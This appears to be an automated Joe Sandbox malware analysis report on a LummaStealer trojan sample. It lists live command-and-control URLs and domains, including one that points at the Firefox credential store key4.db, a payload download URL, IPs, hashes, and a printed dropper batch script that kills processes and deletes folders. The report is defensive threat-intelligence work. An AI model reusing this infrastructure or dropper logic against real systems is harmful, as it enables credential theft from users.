C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe	71%	ReversingLabs	Win32.Trojan.LummaStealer

Source	Detection	Scanner	Label	Link
https://librari-night.sbs:443/apihv.default-release/key4.dbPK	100%	Avira URL Cloud	malware
https://librari-night.sbs:443/apitPK	100%	Avira URL Cloud	malware
http://usbtor.ru/viewtopic.php?t=798)Z	0%	Avira URL Cloud	safe
https://librari-night.sbs/b	100%	Avira URL Cloud	malware
https://librari-night.sbs/=	100%	Avira URL Cloud	malware
https://librari-night.sbs/apiAA==	100%	Avira URL Cloud	malware
http://usbtor.ru/viewtopic.php?t=798)Z	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
joxi.net	176.9.162.205	true	false	high
librari-night.sbs	172.67.206.172	true	false	high
processhol.sbs	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://librari-night.sbs/api	false	high
p3ar11fter.sbs	false	high
http://joxi.net/4Ak49WQH0GE3Nr.mp3	false	high
peepburry828.sbs	false	high
p10tgrace.sbs	false	high
processhol.sbs	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://joxi.net/4Ak49WQH0GE3Nr.mp3openSizeofResourcegfDASrtdstyfewrtydwyu3467YdesauydgewyuyVirtualPr	Installer.exe, 0000000B.00000000.2101759997.0000000000264000.00000002.00000001.01000000.00000007.sdmp, Installer.exe, 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmp, Installer.exe.9.dr	false		high
http://crt.sectigo.com/SectigoRSACodeSigningCA2.crt0#	Installer.exe.9.dr	false		high
https://sectigo.com/CPS0	file.exe, Installer.exe.9.dr	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	file.exe	false		high
https://librari-night.sbs/	RegSvcs.exe, 0000000C.00000002.2319143883.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	file.exe, Installer.exe.9.dr	false		high
https://librari-night.sbs:443/api	RegSvcs.exe, 0000000C.00000002.2318932004.0000000000C09000.00000004.00000020.00020000.00000000.sdmp	false		high
https://librari-night.sbs:443/apitPK	RegSvcs.exe, 0000000C.00000002.2318932004.0000000000C09000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://librari-night.sbs/b	RegSvcs.exe, 0000000C.00000002.2319143883.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	file.exe	false		high
http://joxi.net/4Ak49WQH0GE3Nr.mp36U	Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	file.exe	false		high
https://librari-night.sbs/=	RegSvcs.exe, 0000000C.00000002.2319143883.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://usbtor.ru/viewtopic.php?t=798)Z	file.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.microsoft.c	RegSvcs.exe, 0000000C.00000002.2319086151.0000000000C45000.00000004.00000020.00020000.00000000.sdmp	false		high
http://joxi.net/4Ak49WQH0GE3Nr.mp3ouM	Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA2.crl0t	Installer.exe.9.dr	false		high
https://librari-night.sbs:443/apihv.default-release/key4.dbPK	RegSvcs.exe, 0000000C.00000002.2318932004.0000000000C09000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://joxi.net/4Ak49WQH0GE3Nr.mp3S	Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	file.exe	false		high
https://librari-night.sbs/apiAA==	RegSvcs.exe, 0000000C.00000002.2319745447.000000000346E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.206.172	librari-night.sbs	United States		13335	CLOUDFLARENETUS	false
176.9.162.205	joxi.net	Germany		24940	HETZNER-ASDE	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1560657
Start date and time:	2024-11-22 05:01:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/17@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 90% Number of executed functions: 138 Number of non-executed functions: 279
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
23:02:03	API Interceptor	1x Sleep call for process: Installer.exe modified
23:02:05	API Interceptor	10x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.206.172	injector V2.5.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	Unpacker.exe	Get hash	malicious	LummaC	Browse
176.9.162.205	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Panda Stealer, Stealc	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	OTKqkliMvG.exe	Get hash	malicious	RedLine	Browse	joxi.net/KAx471XHvWVMDA.dll
	pdRXMvn4sP.exe	Get hash	malicious	DCRat	Browse	joxi.net/ZrJl0w4ibZNq32.bin
	itM6aejkLX.exe	Get hash	malicious	Ficker Stealer RedLine	Browse	joxi.net/n2YJDN3Ue8veGA.proj
	OhGodAnETHlargementPill.sfx.exe	Get hash	malicious	Quasar RedLine	Browse	joxi.net/J2bwkXySVlvlwA.proj

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
librari-night.sbs	injector V2.5.exe	Get hash	malicious	LummaC	Browse	172.67.206.172
	Documento.exe	Get hash	malicious	LummaC	Browse	104.21.85.146
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	104.21.85.146
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC	Browse	104.21.85.146
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.172
joxi.net	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Panda Stealer, Stealc	Browse	176.9.162.205
	n7ZKbApaa3.dll	Get hash	malicious	LummaC, Xmrig	Browse	78.47.21.153
	PqSIlYOaIF.exe	Get hash	malicious	LummaC, Xmrig	Browse	78.47.21.153
	inject.exe	Get hash	malicious	RedLine, Xmrig	Browse	188.114.97.3
	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	7aHn0kxDWZ.exe	Get hash	malicious	Xmrig	Browse	188.114.96.3
	BlazeHack.exe	Get hash	malicious	PureLog Stealer, RedLine, Xmrig	Browse	188.114.97.3
	CKHSihDX4S.exe	Get hash	malicious	RedLine, Xmrig	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse	49.13.32.95
	1.e.msi	Get hash	malicious	DanaBot	Browse	148.251.107.246
	1.e.msi	Get hash	malicious	DanaBot	Browse	148.251.107.246
	exe009.exe	Get hash	malicious	Emotet	Browse	195.201.56.70
	owari.ppc.elf	Get hash	malicious	Unknown	Browse	195.201.30.54
	________.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
	bPRQRIfbbq.exe	Get hash	malicious	Unknown	Browse	95.216.12.30
	bPRQRIfbbq.exe	Get hash	malicious	Unknown	Browse	168.119.160.252
	AD6dpKQm7n.exe	Get hash	malicious	Unknown	Browse	144.76.175.205
	AD6dpKQm7n.exe	Get hash	malicious	Unknown	Browse	195.201.9.37
CLOUDFLARENETUS	https://365214tesauppeortbasd132.z26.web.core.windows.net/#	Get hash	malicious	TechSupportScam	Browse	104.22.44.142
	http://103.212.224.14:9998/hello	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC	Browse	172.67.155.248
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.155.248
	file.exe	Get hash	malicious	LummaC	Browse	104.21.66.38
	file.exe	Get hash	malicious	LummaC	Browse	104.21.66.38
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.155.248
	88a4dd8-Contract Agreement-Final378208743.pdf	Get hash	malicious	Unknown	Browse	104.16.123.96
	754619b-Contract Agreement-Final727916073.pdf	Get hash	malicious	Unknown	Browse	104.18.95.41
	arm.nn-20241122-0008.elf	Get hash	malicious	Mirai, Okiru	Browse	104.28.200.40

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.172
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.172

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\main\7z.exe	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Panda Stealer, Stealc	Browse
	n7ZKbApaa3.dll	Get hash	malicious	LummaC, Xmrig	Browse
	PqSIlYOaIF.exe	Get hash	malicious	LummaC, Xmrig	Browse
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse
	UwKpCJ6l4p.exe	Get hash	malicious	DCRat	Browse
	inject.exe	Get hash	malicious	RedLine, Xmrig	Browse
	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	7aHn0kxDWZ.exe	Get hash	malicious	Xmrig	Browse
C:\Users\user\AppData\Local\Temp\main\7z.dll	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Panda Stealer, Stealc	Browse
	n7ZKbApaa3.dll	Get hash	malicious	LummaC, Xmrig	Browse
	PqSIlYOaIF.exe	Get hash	malicious	LummaC, Xmrig	Browse
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse
	UwKpCJ6l4p.exe	Get hash	malicious	DCRat	Browse
	inject.exe	Get hash	malicious	RedLine, Xmrig	Browse
	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	7aHn0kxDWZ.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\main\7z.dll

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1679360
Entropy (8bit):	6.278252955513617
Encrypted:	false
SSDEEP:	24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
MD5:	72491C7B87A7C2DD350B727444F13BB4
SHA1:	1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
SHA-256:	34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
SHA-512:	583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: n7ZKbApaa3.dll, Detection: malicious, Browse Filename: PqSIlYOaIF.exe, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: UwKpCJ6l4p.exe, Detection: malicious, Browse Filename: inject.exe, Detection: malicious, Browse Filename: gHPYUEh253.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 7aHn0kxDWZ.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......\|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\7z.exe

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	468992
Entropy (8bit):	6.157743912672224
Encrypted:	false
SSDEEP:	6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
MD5:	619F7135621B50FD1900FF24AADE1524
SHA1:	6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
SHA-256:	344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
SHA-512:	2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: n7ZKbApaa3.dll, Detection: malicious, Browse Filename: PqSIlYOaIF.exe, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: UwKpCJ6l4p.exe, Detection: malicious, Browse Filename: inject.exe, Detection: malicious, Browse Filename: gHPYUEh253.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 7aHn0kxDWZ.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	222
Entropy (8bit):	4.855194602218789
Encrypted:	false
SSDEEP:	6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
MD5:	68CECDF24AA2FD011ECE466F00EF8450
SHA1:	2F859046187E0D5286D0566FAC590B1836F6E1B7
SHA-256:	64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
SHA-512:	471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
Malicious:	false
Preview:	Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	2354366
Entropy (8bit):	5.892072121713162
Encrypted:	false
SSDEEP:	24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xM:R9kqGu7okoZscCnf0/Zs9N
MD5:	5054A8DF169D8E6D7B594E0745D359C5
SHA1:	1494D40F91553D1F288A86C7BA8A622FB7830240
SHA-256:	9FC8E80432DD949130510671D7810110F5C84FD1876A8C624B500D1B1A999446
SHA-512:	702069B56A78CD925C5AE032C978C375F19E81E4191C3DA5DA04791A9617C8778A1A1F737AFBA90EB32976E9993E20626C1D407BB863733E2A871D9F772A9BA1
Malicious:	false
Preview:	KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	918840
Entropy (8bit):	7.692518102409107
Encrypted:	false
SSDEEP:	24576:ojMYNiVLapQ8MbIeXuugoKocKUIeXuugoKocKJ:k1OZbIMFYIMFF
MD5:	18EB75EF50B1A51600E686B6B9DE277E
SHA1:	5E83C15E87350658526327253FBD22C546BF9C01
SHA-256:	F5BCE7485128FF917D769FCCB01CE12639FF2278E132CF869E5E90E1A82AF46D
SHA-512:	EB5AFB258A8D6E919B6C1FE73E050A4F43E60C31C34AC2F89C6B94E10660AF26ABD6E63863E72FE27CB05B66FAAA0A424527CC8E45E2B4AC07D4E38C0563CF36
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......//.kN..kN..kN...%..aN...%...N...%..yN..9;..zN..9;..zN..9;..CN...%..bN..kN..0N..=;..jN..=;y.jN..kN..jN..=;..jN..RichkN..........................PE..L....v:a.................&....-..............@....@..........................@/...........@.....................................d.....).............F..8.... /........8...............................@............@..H............................text...)%.......&.................. ..`.rdata...x...@...z...*..............@..@.data.....'.........................@....rsrc........).....................@..@.reloc....... /......4..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	753195
Entropy (8bit):	7.997684361846243
Encrypted:	true
SSDEEP:	12288:59pEORLcBL72DpwhpHzawQ/3tTfcjU0ZWri9KL0oVa:dRLcl73h5aJtfKU0Yri9Ak
MD5:	205E19DF5C0DA1B5176B63DEAC4D13FC
SHA1:	7DBF4DDF79DFE58128D3F63A8C4D85D113ED281B
SHA-256:	2B1DA540C478E02BDF98492EC614C42C5D1C78C784A063CD4A4EC15963064EB0
SHA-512:	0FC10261712F2A3EC5B113AE648069C2F4A09F6CE1E051FDD568E2BA1EA719F1487ED058A4202EFD39B7AE9D027CF8C981ED949894EABDAB848A5A9CF22DCE23
Malicious:	false
Preview:	PK..........uY.)^..}..8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.........5J...l.o..H.....\|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.\|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...~u.(.=.&.&.F...KR....Qu....?...@..-...s.{..u..q.......S......j....v....6....!.,..k..........Ab..x..$.r.u.....!9.{._1.q........e..G....>...j..M.#...1K.....\|...y7.1v1.....S..n.......+A.&...{..Y.3(..`P.:[B.dg.2.<..A......7".v6 ,....V....f..U.....l9.u...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ...,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X.u..<n9.v..=....a.`.n.e......u......d.....i^....XT.7._=9d.as....O3PdW.C.....}

C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	753349
Entropy (8bit):	7.997701096374857
Encrypted:	true
SSDEEP:	12288:J9pEORLcBL72DpwhpHzawQ/3tTfcjU0ZWri9KL0oVe:tRLcl73h5aJtfKU0Yri9A4
MD5:	1171BF3E9EB3D2938F47925B7ADE0D6C
SHA1:	B07E871D019C4A9845F04EAB8F094F9BB1310584
SHA-256:	9191D250D7C10F4B87162CE79DF4DA34747BE7E050381BF5D679ACD8353C4D82
SHA-512:	478DA18F0E4D47CD18769B2A19DEDEE10CFEA1AA34251E68A8D9A8396770E9C90F386B17EBB12DEFAB2C4DA065650DE7FF538F6F4E29E5ADE9AF82D1C4C1BCD7
Malicious:	false
Preview:	PK..........uYB..r+~..+~......file_1.zipPK..........uY.)^..}..8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.........5J...l.o..H.....\|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.\|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...~u.(.=.&.&.F...KR....Qu....?...@..-...s.{..u..q.......S......j....v....6....!.,..k..........Ab..x..$.r.u.....!9.{._1.q........e..G....>...j..M.#...1K.....\|...y7.1v1.....S..n.......+A.&...{..Y.3(..`P.:[B.dg.2.<..A......7".v6 ,....V....f..U.....l9.u...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ...,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X.u..<n9.v..=....a.`.n.e......u......d...

C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	Zip archive data, at least v1.0 to extract, compression method=store
Category:	dropped
Size (bytes):	753503
Entropy (8bit):	7.997716021291246
Encrypted:	true
SSDEEP:	12288:m9pEORLcBL72DpwhpHzawQ/3tTfcjU0ZWri9KL0oVh:kRLcl73h5aJtfKU0Yri9A/
MD5:	D5779B3F2C5AABF196D0B6292473E64D
SHA1:	51C3140D860182BD7B61D2A79BBA1E1961CD01E2
SHA-256:	F9A01E32A05911FD847822DAE4C55A326D8FE136B07CE68904FEC07CFBD1AD37
SHA-512:	2358F28AAC9FF742A893D74D3AC8E2B054C86F47020EEF9B09D114253D4E64F73EB3541043A5696D5AB2C0A0854A2FF832E643D2F85C14488AF8656E34F27635
Malicious:	false
